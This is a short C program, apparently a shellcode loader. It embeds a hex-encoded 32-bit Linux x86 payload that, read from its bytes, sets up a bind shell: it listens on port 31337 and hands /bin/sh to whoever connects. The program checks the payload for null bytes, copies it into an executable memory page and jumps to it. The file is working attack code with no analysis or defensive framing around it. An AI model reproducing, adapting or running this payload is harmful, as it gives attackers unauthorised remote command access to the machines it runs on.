#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/mman.h>
char *shellcode = "\x31\xc0\x6a\x06\x6a\x01\x6a\x02\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x01\xcd\x80"
"\x89\xc2\x31\xc0\x31\xdb\x53\x66\x68\x7a\x69\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52"
"\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x02\xcd\x80\x31\xc0\x31\xdb\x50\x52\x89\xe1"
"\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x31\xdb\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05\xcd"
"\x80\x50\x31\xc9\x5b\xb0\x3f\xcd\x80\x53\x41\x5b\xb0\x3f\xcd\x80\x53\x41\x5b\xb0"
"\x3f\xcd\x80\x31\xc0\x31\xdb\x50\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d"
"\x54\x24\x0c\x8d\x4c\x24\x08\x8d\x1c\x24\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01"
"\xcd\x80";
int main(void) {
int i;
int null_bytes = 0;
char *payload;
for ( i = 0; i < strlen(shellcode); i++ ) {
if ( shellcode[i] == '\x00' ) {
null_bytes++;
}
}
if ( null_bytes == 0 ) {
printf("[*] %i null bytes detected.\n", null_bytes);
printf("[+] Payload is clean. Ready to execute.\n");
}
else if ( null_bytes != 0 ) {
printf("[*] %i null bytes detected.\n", null_bytes);
printf("[-] Payload is not clean. Bailing...\n");
return ( -1 );
}
printf("[*] Payload length: %i bytes.\n", strlen(shellcode));
printf("[*] Executing the buffer...");
payload = mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
memcpy(payload, shellcode, strlen(shellcode));
__asm__ __volatile__("call *%%eax"
:
: "r"(payload));
return ( 0 );
}
